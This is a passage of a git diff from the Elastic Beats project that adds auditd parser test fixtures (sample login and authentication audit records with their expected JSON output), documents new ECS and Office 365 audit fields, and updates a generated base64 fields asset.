"type=USER_AUTH msg=audit(1610903558.178:595): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:authentication acct=\"root\" exe=\"/usr/bin/chfn\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/chfn", + "pid": 2954 + }, + "related": { + "user": [ + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "op": "PAM:accounting", + "terminal": "pts/2" + }, + "message_type": "user_acct", + "result": "success", + "sequence": 596, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/bin/chfn", + "object": { + "primary": "pts/2", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "was-authorized", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_ACCT msg=audit(1610903558.178:596): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:accounting acct=\"root\" exe=\"/usr/bin/chfn\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/chfn", + "pid": 2954 + }, + "related": { + "user": [ + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant" + } + } +] \ No newline at end of file diff --git a/auditbeat/module/auditd/testdata/userlogin.log b/auditbeat/module/auditd/testdata/userlogin.log new file mode 100644 index 000000000000..cd4603826f7b --- /dev/null +++ b/auditbeat/module/auditd/testdata/userlogin.log @@ -0,0 +1,4 @@ +type=USER_LOGIN msg=audit(1553501549.148:110544844): user pid=374 uid=0 auid=4294967295 ses=4294967295 msg='op=login acct="(unknown)" exe="/usr/sbin/sshd" hostname=localhost addr=1.2.3.4 terminal=ssh res=failed' +type=USER_LOGIN msg=audit(1553452002.231:110276965): user pid=10318 uid=0 auid=700 ses=5388 msg='op=login id=700 exe="/usr/sbin/sshd" hostname=1.2.3.4 addr=1.2.3.4 terminal=/dev/pts/0 res=success' +type=USER_AUTH msg=audit(1552714590.571:21114): pid=11312 uid=0 auid=0 ses=62 msg='op=PAM:authentication acct="bob" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/0 res=success' +type=CRED_ACQ msg=audit(1553557236.015:4088825): pid=9033 uid=0 auid=1001 ses=352 msg='op=PAM:setcred acct="bob" exe="/usr/sbin/sshd" hostname=localhost addr=127.0.0.1 terminal=ssh res=success' diff --git a/auditbeat/module/auditd/testdata/userlogin.log-expected.json b/auditbeat/module/auditd/testdata/userlogin.log-expected.json new file mode 100644 index 000000000000..43de97179d46 --- /dev/null +++ b/auditbeat/module/auditd/testdata/userlogin.log-expected.json @@ -0,0 +1,257 @@ +[ + { + "auditd": { + "data": { + "acct": "(unknown)", + "hostname": "localhost", + "op": "login", + "terminal": "ssh" + }, + "message_type": "user_login", + "result": "fail", + "sequence": 110544844, + "summary": { + "actor": { + "primary": "unset", + "secondary": "(unknown)" + }, + "how": "/usr/sbin/sshd", + "object": { + "primary": "ssh", + "secondary": "1.2.3.4", + "type": "user-session" + } + } + }, + "event": { + "action": "logged-in", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_LOGIN msg=audit(1553501549.148:110544844): user pid=374 uid=0 auid=4294967295 ses=4294967295 msg='op=login acct=\"(unknown)\" exe=\"/usr/sbin/sshd\" hostname=localhost addr=1.2.3.4 terminal=ssh res=failed'" + ], + "outcome": "failure", + "type": [ + "start", + "authentication_failure" + ] + }, + "network": { + "direction": "ingress" + }, + "process": { + "executable": "/usr/sbin/sshd", + "pid": 374 + }, + "related": { + "user": [ + "(unknown)" + ] + }, + "service": { + "type": "auditd" + }, + "source": { + "ip": "1.2.3.4" + }, + "user": { + "effective": { + "name": "(unknown)" + } + } + }, + { + "auditd": { + "data": { + "hostname": "1.2.3.4", + "id": "700", + "op": "login", + "terminal": "/dev/pts/0" + }, + "message_type": "user_login", + "result": "success", + "sequence": 110276965, + "session": "5388", + "summary": { + "actor": { + "primary": "700", + "secondary": "700" + }, + "how": "/usr/sbin/sshd", + "object": { + "primary": "/dev/pts/0", + "secondary": "1.2.3.4", + "type": "user-session" + } + } + }, + "event": { + "action": "logged-in", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_LOGIN msg=audit(1553452002.231:110276965): user pid=10318 uid=0 auid=700 ses=5388 msg='op=login id=700 exe=\"/usr/sbin/sshd\" hostname=1.2.3.4 addr=1.2.3.4 terminal=/dev/pts/0 res=success'" + ], + "outcome": "success", + "type": [ + "start", + "authentication_success" + ] + }, + "network": { + "direction": "ingress" + }, + "process": { + "executable": "/usr/sbin/sshd", + "pid": 10318 + }, + "service": { + "type": "auditd" + }, + "source": { + "ip": "1.2.3.4" + }, + "user": { + "audit": { + "id": "700" + }, + "id": "700" + } + }, + { + "auditd": { + "data": { + "acct": "bob", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:authentication", + "terminal": "/dev/pts/0" + }, + "message_type": "user_auth", + "result": "success", + "sequence": 21114, + "session": "62", + "summary": { + "actor": { + "primary": "root", + "secondary": "bob" + }, + "how": "/bin/su", + "object": { + "primary": "/dev/pts/0", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "authenticated", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_AUTH msg=audit(1552714590.571:21114): pid=11312 uid=0 auid=0 ses=62 msg='op=PAM:authentication acct=\"bob\" exe=\"/bin/su\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/0 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/bin/su", + "pid": 11312 + }, + "related": { + "user": [ + "bob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "0", + "name": "root" + }, + "effective": { + "id": "9999", + "name": "bob" + }, + "id": "0", + "name": "root" + } + }, + { + "auditd": { + "data": { + "acct": "bob", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:setcred", + "terminal": "ssh" + }, + "message_type": "cred_acq", + "result": "success", + "sequence": 4088825, + "session": "352", + "summary": { + "actor": { + "primary": "alice", + "secondary": "bob" + }, + "how": "/usr/sbin/sshd", + "object": { + "primary": "ssh", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "acquired-credentials", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=CRED_ACQ msg=audit(1553557236.015:4088825): pid=9033 uid=0 auid=1001 ses=352 msg='op=PAM:setcred acct=\"bob\" exe=\"/usr/sbin/sshd\" hostname=localhost addr=127.0.0.1 terminal=ssh res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/sbin/sshd", + "pid": 9033 + }, + "related": { + "user": [ + "alice", + "bob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1001", + "name": "alice" + }, + "effective": { + "id": "9999", + "name": "bob" + }, + "id": "1001", + "name": "alice" + } + } +] \ No newline at end of file diff --git a/filebeat/docs/fields.asciidoc b/filebeat/docs/fields.asciidoc index b94b9e22a0f7..bdb00d656b35 100644 --- a/filebeat/docs/fields.asciidoc +++ b/filebeat/docs/fields.asciidoc @@ -525,54 +525,6 @@ type: keyword Name of the group. -type: keyword - --- - -[float] -=== effective - -Effective user information. - - -*`user.effective.id`*:: -+ --- -Effective user ID. - -type: keyword - --- - -*`user.effective.name`*:: -+ --- -Effective user name. - -type: keyword - --- - -[float] -=== group - -Effective group information. - - -*`user.effective.group.id`*:: -+ --- -Effective group ID. - -type: keyword - --- - -*`user.effective.group.name`*:: -+ --- -Effective group name. - type: keyword -- @@ -41334,7 +41286,7 @@ example: apache + -- Raw text message of entire event. Used to demonstrate log integrity. -This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. type: keyword @@ -41387,7 +41339,7 @@ example: Terminated an unexpected process + -- Reference URL linking to additional information about this event. -This URL links to a static definition of the this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. type: keyword @@ -42578,6 +42530,19 @@ example: darwin -- +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`host.os.version`*:: + -- @@ -43652,6 +43617,19 @@ example: darwin -- +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`observer.os.version`*:: + -- @@ -43822,6 +43800,19 @@ example: darwin -- +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`os.version`*:: + -- @@ -46973,6 +46964,7 @@ URL fields provide support for complete or partial URLs, and supports the breaki -- Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. type: keyword @@ -47148,6 +47140,119 @@ The user fields describe information about the user that is relevant to the even Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.domain`*:: + -- @@ -47158,6 +47263,119 @@ type: keyword -- +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.email`*:: + -- @@ -47261,6 +47479,119 @@ example: ["kibana_admin", "reporting_user"] -- +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + [float] === user_agent @@ -47377,6 +47708,19 @@ example: darwin -- +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`user_agent.os.version`*:: + -- @@ -47962,11 +48306,6 @@ example: 0 -- -[float] -=== audit - - - *`elasticsearch.audit.layer`*:: + @@ -48030,6 +48369,27 @@ example: ['kibana_admin', 'beats_admin'] -- +*`elasticsearch.audit.user.run_as.name`*:: ++ +-- +type: keyword + +-- + +*`elasticsearch.audit.user.run_as.realm`*:: ++ +-- +type: keyword + +-- + +*`elasticsearch.audit.component`*:: ++ +-- +type: keyword + +-- + *`elasticsearch.audit.action`*:: + -- @@ -48126,6 +48486,13 @@ type: text -- +*`elasticsearch.audit.invalidate.apikeys.owned_by_authenticated_user`*:: ++ +-- +type: boolean + +-- + [float] === deprecation @@ -110208,6 +110575,13 @@ Fields from Office 365 Management API audit logs. +*`o365.audit.AADGroupId`*:: ++ +-- +type: keyword + +-- + *`o365.audit.Actor`*:: + -- @@ -110348,6 +110722,13 @@ type: text -- +*`o365.audit.CommunicationType`*:: ++ +-- +type: keyword + +-- + *`o365.audit.CorrelationId`*:: + -- @@ -110383,6 +110764,13 @@ type: keyword -- +*`o365.audit.DoNotDistributeEvent`*:: ++ +-- +type: boolean + +-- + *`o365.audit.EntityType`*:: + -- @@ -110390,6 +110778,13 @@ type: keyword -- +*`o365.audit.ErrorNumber`*:: ++ +-- +type: keyword + +-- + *`o365.audit.EventData`*:: + -- @@ -110425,6 +110820,13 @@ type: keyword -- +*`o365.audit.FromApp`*:: ++ +-- +type: boolean + +-- + *`o365.audit.GroupName`*:: + -- @@ -110474,6 +110876,13 @@ type: keyword -- +*`o365.audit.IsDocLib`*:: ++ +-- +type: boolean + +-- + *`o365.audit.Item.*`*:: + -- @@ -110488,6 +110897,13 @@ type: object -- +*`o365.audit.ItemCount`*:: ++ +-- +type: long + +-- + *`o365.audit.ItemName`*:: + -- @@ -110502,6 +110918,34 @@ type: keyword -- +*`o365.audit.ListBaseTemplateType`*:: ++ +-- +type: keyword + +-- + +*`o365.audit.ListBaseType`*:: ++ +-- +type: keyword + +-- + +*`o365.audit.ListColor`*:: ++ +-- +type: keyword + +-- + +*`o365.audit.ListIcon`*:: ++ +-- +type: keyword + +-- + *`o365.audit.ListId`*:: + -- @@ -110509,6 +110953,13 @@ type: keyword -- +*`o365.audit.ListTitle`*:: ++ +-- +type: keyword + +-- + *`o365.audit.ListItemUniqueId`*:: + -- @@ -110789,6 +111240,13 @@ type: keyword -- +*`o365.audit.TemplateTypeId`*:: ++ +-- +type: keyword + +-- + *`o365.audit.UniqueSharingId`*:: + -- diff --git a/filebeat/include/fields.go b/filebeat/include/fields.go index fc47070e6e2e..5d99d5a7ede9 100644 --- a/filebeat/include/fields.go +++ b/filebeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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